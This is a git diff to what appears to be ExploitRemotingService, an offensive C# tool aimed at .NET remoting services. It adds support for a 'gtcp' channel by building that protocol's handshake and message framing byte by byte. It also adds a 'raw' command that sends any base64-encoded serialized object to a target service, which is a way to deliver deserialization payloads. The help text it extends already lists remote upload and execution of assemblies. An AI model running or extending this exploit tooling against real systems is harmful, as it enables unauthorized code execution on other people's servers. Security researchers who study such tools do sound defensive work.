diff --git a/ExploitRemotingService/Program.cs b/ExploitRemotingService/Program.cs index 6ec92ec..c4ee07c 100644 --- a/ExploitRemotingService/Program.cs +++ b/ExploitRemotingService/Program.cs @@ -77,6 +77,7 @@ static void SetupServer() switch (_uri.Scheme) { + case "gtcp": case "tcp": { dict["port"] = _port; @@ -104,7 +105,7 @@ private static Stream BindStream() { Stream ret = null; - if (_uri.Scheme == "tcp") + if (_uri.Scheme == "tcp" || _uri.Scheme == "gtcp") { TcpClient client = new TcpClient(); @@ -234,6 +235,7 @@ static void PrintHelp(OptionSet p) run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version +raw base64_object : Send a raw serialized object to the service "); } @@ -675,11 +677,89 @@ private static IRemoteClass CreateRemoteClass() return GetExistingRemoteClass(); } - } - - static object SendRequest(object o, bool remote) + } + + public static void WriteLabelledStream(MemoryStream inputStream, Stream outputStream) + { + MemoryStream stm = new MemoryStream(); + BinaryWriter writer = new BinaryWriter(stm); + + writer.Write((byte)0x37); // COMMAND_MAGIC_CODE + writer.Write((int)inputStream.Length); + writer.Write((byte)1); // Finished? + writer.Write(inputStream.ToArray()); + + outputStream.Write(stm.ToArray(), 0, (int)stm.Length); + outputStream.Flush(); + } + + static object SendRequestGenuineChannel(byte[] data) + { + using (Stream netStream = BindStream()) + { + MemoryStream stm = new MemoryStream(); + BinaryWriter writer = new BinaryWriter(stm); + + byte genuineConnectionType = 1; + + //LowLevel_OpenConnection() + // MessageCoder.SerializeConnectionHeader() + writer.Write((byte)3); // Protocol Version + writer.Write((byte)genuineConnectionType); + writer.Write("$/__GC/" + _uri.Host); //ConnectionID / ConnectionName + + WriteLabelledStream(stm, netStream); + + stm = new MemoryStream(); + writer = new BinaryWriter(stm); + + //SendConnectionInfo + writer.Write(String.Format("{0}://{1}", _uri.Scheme, Guid.NewGuid())); // LocalUri + writer.Write((int) -1); // Undocumented + writer.Write(genuineConnectionType); + writer.Write((int)2); // LocalHostUniqueIdentifier + + WriteLabelledStream(stm, netStream); + + BinaryReader reader = new BinaryReader(netStream); + reader.ReadByte(); + Int32 length = reader.ReadByte(); + reader.ReadInt32(); + String remoteUri = reader.ReadString(); + Int32 remoteHostUniqueIdentifier = reader.ReadInt32(); + + //LowLevel_StartSending() + stm = new MemoryStream(); + writer = new BinaryWriter(stm); + + writer.Write("D"); // basicSecuritySession + + //MessageCoder.Serialize() + writer.Write((byte)0); //Compression + writer.Write((byte)1); //GenuineMessageType 1 + writer.Write(2); // MessageID + writer.Write(0); // ReplyToId + writer.Write((bool)false); // Is OneWay + writer.Write((bool)false); // MarshalByRef + writer.Write((Int16)0); // SecuritySessionParameters.Attributes + writer.Write(String.Empty); // RemoteTransportUser + + // Write ITransportHeaders + writer.Write("__RequestUri"); + writer.Write(_uri.PathAndQuery); + writer.Write("Content-Type"); + writer.Write("application/octet-stream"); + writer.Write("__"); // headers end tag + writer.Write(data); + + WriteLabelledStream(stm, netStream); + } + + return null; + } + + static object SendRequest(byte[] data) { - byte[] data = SerializeObject(o, remote); MemoryStream stm = new MemoryStream(); BinaryWriter writer = new BinaryWriter(stm); @@ -712,7 +792,32 @@ static object SendRequest(object o, bool remote) return ParseResult(reader); } - } + } + } + + static object SendRequest(string base64) + { + if (_uri.Scheme.Equals("gtcp")) + { + return SendRequestGenuineChannel(Convert.FromBase64String(base64)); + } + else + { + return SendRequest(Convert.FromBase64String(base64)); + } + } + + static object SendRequest(object o, bool remote) + { + byte[] data = SerializeObject(o, remote); + if (_uri.Scheme.Equals("gtcp")) + { + return SendRequestGenuineChannel(data); + } + else + { + return SendRequest(data); + } } public static T MakeCall(string path, MethodBase mi, params object[] cmdargs) @@ -925,9 +1030,23 @@ static int Main(string[] args) Console.WriteLine("Detected version {0} server", _ver); } - IRemoteClass ret = CreateRemoteClass(); + if (_cmd.Equals("raw")) + { + if (_cmdargs.Count != 1) + { + Console.Error.WriteLine("Must specify base64 encoded object"); + } + else + { + Console.WriteLine(SendRequest(_cmdargs.First())); + } + } + else + { + IRemoteClass ret = CreateRemoteClass(); - ExecuteCommand(ret); + ExecuteCommand(ret); + } } catch (Exception ex) { @@ -939,7 +1058,7 @@ static int Main(string[] args) else { return 1; - } - } + } + } } } diff --git a/README.md b/README.md index 04a67c9..22fc931 100644 --- a/README.md +++ b/README.md @@ -44,6 +44,7 @@ ls remotedir : List a remote directory run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version +raw base64_object : Send a raw serialized object to the service This tool supports exploit both TCP remoting services and local IPC services. To test